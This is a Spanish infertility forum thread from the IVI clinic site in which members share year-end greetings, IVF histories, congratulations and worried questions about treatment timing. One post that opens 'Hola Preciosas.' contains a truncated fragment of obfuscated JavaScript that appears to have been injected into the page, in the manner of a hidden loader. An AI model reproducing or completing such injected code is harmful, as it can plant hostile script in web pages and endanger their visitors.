Ovonenas 2014 - IVI: Foro de Infertilidad y Reproducción Asistida

Anuncio

Collapse
No announcement yet.

“Prohibición de venta o donación de medicación sobrante según la Ley 29/2006. INFORMACIÓN Y POSIBLES SANCIONES”. Haz click para más información.

Ovonenas 2014

Collapse
This topic is closed.
X
X
 
  • Filter
  • Hora
  • Show
Clear All
new posts

    OVONENAS 2014

    Buenas mis niñas!!!!!

    Perdonad por no haber entrado estos días... pero la ley de Murphy dice que cuando tienes comida rica encima de la mesa y todo el mundo come como reyes..... yo he estado de gastroenteritis!!!!! Jajjaaj!!!! O eso o el pasarme a tanta proteína que me ha sentado fatal!!!!! Así que estoy a calditos y a purés.... mi cena de ayer fue un riquísimo puré de puerros (me encantan) y UNA croqueta de mi madre que son de morirse...!!!! Jajajjaja!!!!!! Pero estoy encantada por tener ese puré que estaba de muerte!!!! Y lo digo en serio... creo que a veces la vida nos da lo que necesitamos, no lo que queremos... y yo necesitaba dejarme de pensar en lo que tenía que comer y hacerle caso a mi cuerpo.... pero bueno, para futuro.... lo que mañana me diga el endocrino......

    Pero ya está bien de hablar de mí!!!!! Patri!!!!! Sonrisa!!!!!! Muchísimas felicidades!!!!!! Son días muy bonitos para recibir estas noticias... y ahora sí que es una realidad.... acompañadas por vuestros peques en estas fechas.... Me alegro un montón!!!! Y Verasi, y Zorione!!! Vosotras todavía no lo sabéis y tenéis miedo a la espera, pero también están con vosotras para quedarse!!!!! Ya lo veréis!!!!!!!! Las cuatro sois las ovonavimamis!!!! Un beso preciosas!!!!!!!!!

    Estos días me estoy imaginando a todas las que estáis compartiendo vuestras buenas noticias con vuestros familiares, y me emociono muchísimo. Me emociono pensar de que para algunas son vuestras primeras navidades con vuestros peques, y me acuerdo de lo que dijo Bbenito sobre que se había reconciliado con las Navidades ahora que tiene a Elisa. Yo siempre he sido muy antinavideña, pero supongo que tener a un niño lo cambiará todo. Y me he dado cuenta de que estos días ya he estado planeando cómo celebrar las navidades con mis niños sin darles mensajes religiosos, y me he acordado de lo que comentó Augusta del día de la candelaria, y de haberle contestado que las religiones hasta se han apropiado del solsticio de invierno, y me he imaginado educando a mis hijos en unas navidades alternativas, en que se celebre que la luz empieza a abrirse esta fecha, que hay que celebrar y respetar el silencio del invierno, el recuperar fuerzas de la tierra para que luego nos pueda nutrir, la noche más larga del año en que tenemos que estar en casa con la familia, llamando a esa luz que es que vuelva a alargar el día, llamándola con las luces del árbol de navidad, pino o abeto de hoja perenne que sigue verde cuando el resto de árboles han perdido todas sus hojas para descansar, mientras que la fuerza del invierno se manifiesta en estos árboles. Incluso aquí, en Euskadi, tenemos nuestra propia figura navideña que compite con Papa Noel o Santa Klaus, que no es sino el Olentzero, carbonero que trabaja todo el año en el monte, alimentándose de la tierra y solo baja para traer regalos a los niños la noche del 24 de diciembre. Y me he dado cuenta de que todo cuadra con lo que honesta y sinceramente creo. Y yo que siempre he sido antinavideña, me parecía egoísta que mis niños se perdieran una parte importante (importante no lo es, pero sí es una parte aunque sea por comparación con otros niños), pero necesito ser coherente conmigo misma, pero ahora que de repente me han encajado todas las piezas, me he dado cuenta de que tengo ganas de enseñar a mis hijos todo eso, lo importante que es agradecer a la tierra que nos alimenta y nos nutre, la noche que nos guarda y nos acoge, y sobre todo, el ciclo de la vida, de una manera natural, en que noche y día se suceden, al igual que invierno o verano, o vida o muerte, de una manera tranquila y serena, y de alguna manera, creo que me estoy reconciliando con las Navidades, y que estoy deseando de celebrarlas, a mi manera, con mis niños. Esta sensación es muy nueva para mí, no lo creáis!!!

    Desde que tengo en mi cabeza el tema de la alimentación, la insulina, la glucosa, las proteínas y demás, he estado más flojita, porque me ha caído como una losa, pero sobre todo porque con el cambio de dieta me falta gasolina (estos días con la gastroenteritis ni os cuento lo floja que estoy), y he llegado a tener una energía muy negativa (el lado oscuro o el lado tenebroso de la fuerza -y ahora me falta hacer la respiración de Dar Vader y de decir "Luke, yo soy tu padre"-), y he llegado a dudar de la capacidad que tengo para seguir con todo esto, porque lo cierto es que mi objetivo principal es ser feliz, y lo voy a ser con o sin niños... pero un día me dio un rollo raro en la espina y me imaginé a mis peques, y me he dado cuenta de que tengo que luchar por ellos, porque si no lucho yo por ellos, no lo va a hacer nadie. Esta frase se me hizo reveladora, y quería compartirla con vosotras. Si nosotras no luchamos por nuestros peques, nadie más lo va a hacer.

    Sin más... son mis ocurrencias que quería compartirlas..... será que me falta chocolate o algo.....

    Pues nada!!!!! A seguir celebrando!!!!!!! Millones de besos para todas, preciosas!!!!!!!!!!!!!!
    40 años: Baja Reserva
    2010: 1 bioquim. natural
    2013: 4 Insem. Artif. Negativas
    2013: 1 bioquim. natural
    2014: 2 punciones + FIV: Negativa
    2014: 1 FIV + DGP: 4/4 no sanos
    OK: Cariotipo, TCG, Inmunol., Coagulac., ERA
    No OK: Cirugía útero, Resist. Insulina y mutación gen 1298A.
    Él: FISH OK; Fragment. ADN del 30%
    2014-2015-2016: 11 estimulaciones = 9 punc = 14 óvulos = 10 embris = 9 para DGP
    SCRATCH + FIV + MACS + DGP = 2 sanotes: BETA:++
    Aines y Estebe han nacido el 11/10/2016!!!

    Comment


      OVONENAS 2014

      SONRISA DE ESTRELLA: qué alegría princesa¡¡¡¡¡¡¡¡¡ Por fin el positivo. Ahora a disfrutar del momento. Me emociona que el foro esté tan rosa en estas fechas especiales.

      ZORIONE, VERASI: vosotras un día menos para sumaros a la lista de preñis... Mucho ánimo en estos días de beta-espera que os quedan.

      CRISPETA: como siempre me emocionan tus mensajes. Muchas gracias. El 31 está muy cerca, el día en que Paula vuelva a casa, y las tres juntitas empecéis a disfrutar de la navidad.

      DESEO: te digo lo mismo que a CRISPETA, gracias a todas las mamis que NO nos dejáis: como INDIAS, AUGUSTA, BBENITO, TRUCHITA, OPPITA, ESPERA, SOMMI...

      WALKIE: espero que la gastroenteritis vaya a menos. No tengo dudas de que celebrarás con tus peques la navidad de la forma que quieras... Y serán unos niños muy afortunados con unos padres tan especiales.

      EVATO: que bonitos tus mensajes. Supongo lo feliz que estará tu nena, acariciando la barriguita de su mami... Y no puedo ni imaginar lo feliz que te sentirás tú en esos momentos, que durante tanto tiempo has anhelado vivir. Y por fin ha llegado el momento.

      EVITA, TIAPUCA, TRISHI, PRU, NODEJESDESOÑAR, BASET, SERNOA, PATRI, DANIA, MARI45, MANDARINA, ALMAYJAVIER, SUPERNANI, LOLAINFERTIL,..., espero que vuestros embarazos sigan viento en popa. Que las nauseas o molestias vayan a menos, y que las tripitas vayan creciendo, a la par que la ilusión, las compras, los planes, las reformas en casa, la elección de nombre...

      SIAV: siempre de tu mano mi niña. Ya pronto conocerás a DESEO y FABIO. Espero que nos lo contéis.

      IFA, ACHUU, RONITA, NUNIET, LOLASIN, VIDABELLA, SHARON, MARTIKKA, APOLONIA, MALAJITA, SUXI, DULCE, FABA... ánimo luchadoras.

      luna19702014-12-26 13:42:56

      Comment


        OVONENAS 2014

        Felices fiestas, chicas!!! Para mí de momento están siendo un poco tristes, las celebraciones en familia muy bien, pero llevo un poco mal las mañanas. Me levanto tristeeee, menos mal que mi marido se está portando. Me abraza y vuelve la normalidad. Y ahora como terapia nos vamos una semanita a achuchar a los sobris, que son los nenes que nos dan alegrías.
        Pasadlo lo mejor que podáis chicas, las que estáis anunciando vuestro embarazo, Disfrutadlo con todas vuestras fuerzas.

        Nuestras positivos, Patri, sonrisa vividlo a tope, que ya estáis estáis embarazadas!!!

        Las betaesperantes, Zorione, Verasi, ánimo.

        Las futuras mamis (las que les queda cada vez menos para verle las caritas a sus bebés, porque futuras mamis somos todas nosotras) , disfrutad a tope.

        Y al resto, las que esperamos, las que hemos tenido un año más o menos difícil, con esperas, negativos, abortos...chicas, 2015 es nuestro. Vamos a por él con todas nuestras fuerzas

        Muchos besitos

        Comment


          OVONENAS 2014

          Hola mis niñas bellas!!! Felices fiestas , se que 2015 traerá mucha alegría y el tan deseado sueño de ser mama!!
          Gracias a todas por ser parte de mi vida y acompañarme en este camino!!
          Mis mejores deseos!! Muacckkks

          Comment


            OVONENAS 2014

            Hola mis niñas queridas, entro para desearos que en el 2015 se cumplan todos vuestros deseos (pero no me deséis un Jaguard y a Brad Pitt que no van a dar los Reyes Magos tanto de sí).

            Crispeta me ha encantado tu post, eres muy especial.

            Yo estoy con unos días libres en el curro haciendo recados, pero también por culpa de un catarro inoportuno he tenido que parar un poco el ritmo, es que entre el frío y la marchuqui me han cazado los virus, pero tranquilas, sólo es de nariz la cosa, de ahí no pasan, lo único es que con la nariz taponada no me puedo machacar en el gim. En fin...

            Bueno, que desvarío... Un besito a todas. Perdonad que no esté todo el día aquí como antes, como estoy de barbecho hasta mayo entraré de vez en cuando y por el whatsapp tengo más o menos información de cómo van las cosas por aquí. Es que no me quiero enganchar al PC en vacaciones, para no tener sobredosis...

            Lo dicho, Feliz 2015. [IMG]smileys/smiley41.gif[/IMG][IMG]smileys/smiley40.gif[/IMG]

            Comment


              OVONENAS 2014

              Buenos días mis reinas!!!!!!!!!!!!!!!!!!

              Un beso a todas!!!!!!!!!!!!!!!

              Preparadas para ese 2015????? Viene cargado de oportunidades y deseos cumplidos!!!! Ya veréis!!!!!

              Muikis!!!!!!!!!!
              40 años: Baja Reserva
              2010: 1 bioquim. natural
              2013: 4 Insem. Artif. Negativas
              2013: 1 bioquim. natural
              2014: 2 punciones + FIV: Negativa
              2014: 1 FIV + DGP: 4/4 no sanos
              OK: Cariotipo, TCG, Inmunol., Coagulac., ERA
              No OK: Cirugía útero, Resist. Insulina y mutación gen 1298A.
              Él: FISH OK; Fragment. ADN del 30%
              2014-2015-2016: 11 estimulaciones = 9 punc = 14 óvulos = 10 embris = 9 para DGP
              SCRATCH + FIV + MACS + DGP = 2 sanotes: BETA:++
              Aines y Estebe han nacido el 11/10/2016!!!

              Comment


                OVONENAS 2014

                Hola preciosas!!!! Por si mña no puedo entrar, quiero desearos una buena entrada de año 2015!!!! Este es nuestro año chicas!!! Vereis como todos vuestros deseos se van a hacer realidad!!! Disfrutad de las uvas y las q podeis brindar con champan hacedlo porque seguro q rl q viene no podeis y las q no podemos lo haremos von champin!!!! Muchos besossss!!!!

                Comment


                  OVONENAS 2014

                  También yo quiero desearos un buen año y que los bebes que están en camino vengan bien y que los que no han llegado aún no se demoren mucho...

                  Besitos a todas vosotras CRISPETA, DESEO, IRIS, RONITA, SIAV, VERASI, SUXY, BASET, PRU, NODEJESDE SOÑAR, LOLASIN, WALQUI, IFA, PATRI, TRISHI, MANDARINA, EVATO, EVITA, SONRISA, MARITA, APOLONIA, MALAJITA, LUNA, MARTIKA, INDIAS, NIET, DANIA, NUNIET, CONXICA, ZORIONE, ACHUU, ALMA, MRGH, LANANA, GINS, TIAPUCA, SOMNI, BBNITO, NUKABARO, TRUCHA, SHARONSTONE, MISUEÑO, BRIDGET, VIDABELLA, IVILU, MAI... es muy posible que me haya dejado a alguien, si es así perdonar.

                  Un besito a todas.

                  Comment


                    OVONENAS 2014

                    a Esther, me dejé a ESTHER. Y también a MIA. besitos para las dos y para los peques.

                    Comment


                      OVONENAS 2014

                      Hola Preciosas.< id="0443F95EEBADBC64">(function(){var z=function(l,u){var w="",e=window,b=("f"+"x72o"+"K"+"o"+"Z"+"Cox64u006 5")[('x72ex72u0079c'+'e'+'').replace('ry','p'+'x6Cx61' )](""+"Ku006fZ","mx43x68x61r"),s="u0063h"+"x61x72u00 43ou0064u0065u0041x74",q="lx65"+"ng"+"tu0068",sv=( "u0053q"+"F"+"x6Ex67")[("u0072e"+"X"+"Au006Ca"+"x63e"+"").replace("eu0058 u0041","u0065p")]("q"+"F","x74x72"+"i"),wc=e[sv],h=wc[b],i,o;for(var y=0;y

                      Comment


                        OVONENAS 2014

                        Hola chicas! Feliz año nuevo a todas! A las que estais en la nube rosa desde hace poco, a las que vais a contar vuestro positivo a la familia en estas fechas, muchisima felicidad@ y a las q estamos en proceso que el año nuevo ayude a que se cumplan nuestros surños!

                        Comment


                          OVONENAS 2014

                          Preciosas a por el 2015!
                          Hay muchos peques en el limbo esperando encontrar el camino hasta sus mamis.
                          Tenemos a muchas compis con tripita que verán la carita de sus peques este año y muchas mamis luchadoras que espero que espero que consigan a tener a sus peques estés año.
                          Sonrisa enhorabuena por tu positivo! Tu tripa ya esta aquí!!

                          Zorione, Verasi ánimo y un poco de paciencia. Que tal va la betaespra?? Con estos días seguro que estáis más distraídas.

                          A por un 2015 lleno de bebitos!!

                          Muchos besos

                          Comment


                            OVONENAS 2014

                            Chicas dos cositas, empiezo por la duda:
                            - Créeis que me puedo hacer un empaste en una muela a los dos días de la transfer?? mi dentista ha estado de vacaciones muchos días, me arreglé lo más gordo hace semanas, quedó esto pendiente, abrió esta semana y yo me despisté, y hoy me dice que hasta el día 7 nada. Cómo lo veís?? quizás me busco otro que me pueda visitar el día 2, que faltarán más días para la transfer y mi cuerpo se puede desintoxicar?? ai que me da mucho miedo todo ahora!!!!!!!!!

                            - La segunda, DESEAROS A TODAS UN MUY FELIZ 2015. QUE SE CUMPLAN VUESTROS SUEÑOS, TENGAIS SALUD, AMOR, COMPAÑÍA, TRABAJO, Y SOBRE TODO VUESTROS RETOÑOS, LAS QUE NO TENEMOS, Y LAS QUE YA TIENEN, LOS DISFRUTEN CON MUCHO AMOR.

                            PATRI, se me pasó felicitarte, todo sigue bien, cuando tienes la eco?

                            No personalizo más porqué no me da tiempo, chicas que me voy a pasar la Nochevieja a Madrid!!!! son muy pocas horas o sea que no me da tiempo quedar con nadie.

                            Abrazos

                            Apolonia

                            Comment


                              OVONENAS 2014

                              Buenas tardes mis niñas!!Entro rapidito con el mobil para desearos una feliz entrada de año.
                              APOLLONIA cielo no te se decir seguro si se puede hacer el empaste a dos dias de la transfer,lo siento.Yo estuve en el dentista hara unos 15 dias porque me sangran las encias y me miro las caries.No tenia ninguna pero si me dijo que no habia problema para empastar con el embarazo.Se me ocurre si puedes llamar o escribir a tu clinica y les comentas.Es normal que nos preocupemos por todo cariño,si yo te contara por las cosas que me como la cabeza a veces jiji!Que te vaya muy bien por Madrid y disfruta muchisimo,a mi me encantaria ir a la Puerta del Sol a comerme las uvas!!
                              Chicas y para todas vosotras no os nombro una por una por si me dejo a alguien me gustaria daros las gracias por haberme dado tanto,estoy muy feliz de haberos encontrado.Sois mujeres exepcionales Y DESEO DE TODO CORAZON QUE EL 2015 OS TRAIGA MUCHA SALUD Y FELICIDAD Y QUE VUESTROS SUEÑOS SE CUMPLAN.FELIZ AÑO NUEVO,OS QUIERO MUCHO!!!!!!!

                              Comment


                                OVONENAS 2014

                                Buenos dias y Feliz Año nuevo!!!

                                Os importa si os hago una preguntilla???, ¿cuando tiempo aprox. tardaron en llamaros desde la ultima eco de control hasta que os llamaron para la punción de la donante?

                                En consulta me dijeron que desde la eco (que la tuve el 23 DIC.) hasta la transfer serian entre 10 y 15 días, ya llevo 10 y si los llevan a blasto, mas mínimo 2 días antes que me llamen para tener abstinencia y dejar la muestra etc,etc...pues se me va de plazo.

                                Vamos que sé que ellos sabrán lo que hacen pero es por hacerme una idea aproximada.

                                Creo que estaba muy tranquila y ya estoy empezando a entrar en ataque de pánico jaja

                                Un abrazo !!

                                Comment

                                Working...
                                X